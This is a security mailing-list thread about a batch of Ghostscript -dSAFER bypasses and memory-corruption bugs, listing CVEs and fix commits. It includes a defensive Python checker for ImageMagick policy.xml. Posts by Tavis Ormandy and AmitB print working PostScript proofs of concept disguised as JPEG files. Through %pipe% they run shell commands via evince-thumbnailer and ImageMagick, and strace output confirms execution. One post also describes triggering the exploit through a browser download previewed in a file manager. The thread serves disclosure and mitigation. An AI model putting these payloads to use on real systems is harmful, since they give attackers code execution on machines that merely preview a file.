# 699661 - pdf14 garbage collection memory corruption
CVE-2018-16540
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=971472c83a345a16dac9f90f91258bb22dd77f22
# 699663 - .setdistillerkeys memory corruption
CVE Requested (this morning, will be assigned in some hours I expect)
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=241d911127
# 699664 - corrupt device object after error in job
CVE-2018-16541
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=0d3901189f
# 699657 - .tempfile SAFER restrictions seem to be broken
CVE-2018-15908
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8e9ce5016db968b40e4ec255a3005f2786cce45f
# 699665 - memory corruption in aesdecode
CVE-2018-15911
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
# 699668 - .definemodifiedfont memory corruption if /typecheck is handled
CVE-2018-16542
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
# 699670 gssetresolution memory corruption
CVE-2018-16543
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699676 PDF interpreter can leave dangerous operators available
As it's the same commit, I assume it is also covered by CVE-2018-16510 from bug 699671?

I have not yet requested the current issue(s) you spotted.

Ciao, Marcus
Tavis Ormandy
2018-08-23 00:35:11 UTC
Permalink
Thanks Amit, that's scary, it looks like they're working on it right now.

FWIW, I figured out how to reproduce the original bug here in
evince-thumbnailer:

$ cat test.jpeg
%!PS
a0
{ null restore } stopped { pop } if
(ppmraw) selectdevice
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ strace -q -feexecve evince-thumbnailer test.jpeg foo.out
execve("/usr/bin/evince-thumbnailer", ["evince-thumbnailer", "test.jpeg",
"foo.out"], 0x7ffeed3010d0 /* 65 vars */) = 0
execve("/bin/sh", ["sh", "-c", "id"], 0x7ffcf3ea8d18 /* 65 vars */) = 0

Tavis.
Post by AmitB
I also took a look a couple weeks ago at a few of the patches for your
previous bugs from 2 years ago, and found that one of them is incomplete
and still allowing RCE (
https://bugs.ghostscript.com/show_bug.cgi?id=697178)
------------------
$ cat poc.jpg
%!PS
<< (ICCProfilesDir) (%pipe%id > /dev/) >> .setuserparams
currentdevice null true mark /OutputICCProfile (tty)
.putdeviceparams
showpage
$ identify poc.jpg
uid=1000(amit) gid=1000(amit) groups=1000(amit)
After reviewing all of the comments in the original bug report I saw that
you actually mentioned this issue, but it was not taken under
consideration/forgotten for some reason.
So effectively a public RCE PoC has been available for GhostScript for
almost 2 years.
699623 Incomplete fix for #697178 Allowing -dSAFER bypass
But I got no response from them until today.
If you have other channels of contact with them please let them know about
this one too.
Post by Tavis Ormandy
Thanks Alex.
FWIW, not all of these are visible, but I've started filing bugs, I'll
file a few more today and then let the developers work through the most
serious ones.
699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in type checker (!)
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes side effects
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job
I'm working on getting reproducers working for the developers for all
bugs.
Post by Tavis Ormandy
Post by Alex Gaynor
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are
very frequently implemented with a call to ReadImage(), with no checking
that it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested
inside of each other).
The conclusion of this is that people _must not_ attempt to do their
own format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be disabled
with either policy.xml or by uninstalling GS.
Alex
On Tue, Aug 21, 2018 at 11:01 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably
noticed I think everything related to untrusted ghostscript should be
disabled :-)
Post by Bob Friesenhahn
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested that
a fool-proof solution is that Ghostscript should be uninstalled.
Uninstalling Ghostscript entirely might cause software using libgs to
not execute at all unless a stub library is put in its place.
Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate format
in order to convert between formats. EPS content is also embedded in
some other formats.
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
All that is necessary for evil to succeed is for good people to do
nothing.
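Alex's point in the message quoted above is that format sniffing in front of IM/GM is not a defence, so the Ghostscript-backed coders have to be denied in policy.xml itself. The checker below is an added example, not code from the thread or from ImageMagick: it parses a policy.xml and reports which of PS, PS2, PS3, EPS, PDF and XPS are still readable. The two sample policies are constructed, and the case-insensitive glob and brace matching of patterns is this example's approximation of how ImageMagick matches them.

```python
"""Check an ImageMagick policy.xml for Ghostscript-backed coders that are
still allowed to read input.  Added example, not from the thread or ImageMagick."""
import fnmatch
import xml.etree.ElementTree as ET

# Coders ImageMagick delegates to Ghostscript: PS (and its PS2/PS3 level
# variants), EPS, PDF and XPS.
GS_CODERS = ("PS", "PS2", "PS3", "EPS", "PDF", "XPS")

def _expand_braces(pattern):
    """Expand one brace group, e.g. '{PS,EPS}' -> ['PS', 'EPS']."""
    start, end = pattern.find("{"), pattern.find("}")
    if start < 0 or end < start:
        return [pattern]
    head, tail = pattern[:start], pattern[end + 1:]
    return [head + alt + tail for alt in pattern[start + 1:end].split(",")]

def denied_coders(policy_xml):
    """Return the subset of GS_CODERS whose read right the policy removes.

    A coder is denied when a <policy domain="coder"> entry matches its name
    (case-insensitive glob after brace expansion, an assumption here) and
    the entry's rights do not include "read" (for example rights="none")."""
    root = ET.fromstring(policy_xml)
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain", "").lower() != "coder":
            continue
        rights = pol.get("rights", "").lower()
        if not rights or "read" in rights:
            continue  # input is still decodable, so this is not a denial
        for pat in _expand_braces(pol.get("pattern", "")):
            for coder in GS_CODERS:
                if fnmatch.fnmatchcase(coder, pat.upper()):
                    denied.add(coder)
    return denied

def still_allowed(policy_xml):
    """GS_CODERS the policy leaves enabled for input, sorted."""
    return sorted(set(GS_CODERS) - denied_coders(policy_xml))

# Constructed sample: a policy that denies nothing Ghostscript-related.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>"""

# Constructed sample of the hardened policy the thread asks distributions for.
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="PS"/>
  <policy domain="coder" rights="none" pattern="PS2"/>
  <policy domain="coder" rights="none" pattern="PS3"/>
  <policy domain="coder" rights="none" pattern="EPS"/>
  <policy domain="coder" rights="none" pattern="PDF"/>
  <policy domain="coder" rights="none" pattern="XPS"/>
</policymap>"""

if __name__ == "__main__":
    for name, xml in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, "policy still allows:", still_allowed(xml) or "nothing")
```

To audit a real installation, read the installed policy.xml into a string and pass it to still_allowed(); an empty list is the state the thread argues for.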
Tavis Ormandy
2018-08-23 01:57:06 UTC
Permalink
FWIW, I just pinged a contact to check that bug.

Putting the two ICC components together like that is clever, I knew about
the two bugs independently but it hadn't clicked they could be chained
together. Nice.
Tavis Ormandy
2018-08-23 04:24:36 UTC
Permalink
I've verified that on centos7 at least, just opening nautilus on Downloads
is enough to trigger code execution via evince-thumbnailer.

I just called it test.tiff and used <a download href=test.tiff> in Chrome,
opening nautilus executed the command immediately.

I think we should kill (or at least trim the mime types)
in /usr/share/thumbnailers/evince.thumbnailer.

Tavis.
Florian Weimer
2018-08-23 06:12:52 UTC
Permalink
Post by Tavis Ormandy
I think we should kill (or at least trim the mime types)
in /usr/share/thumbnailers/evince.thumbnailer.
Note that this may or may not work, depending on whether the MIME type
detection is identical between the selection of the evince and the
selection of the Ghostscript backend in evince itself.

I remember a case from several years ago where an ImageMagick bug was
still exploitable via mail user agents even though the problematic image
format was not listed in /etc/mailcap. ImageMagick did its own format
detection back then, so all you had to do was to change the file extension.

Thanks,
Florian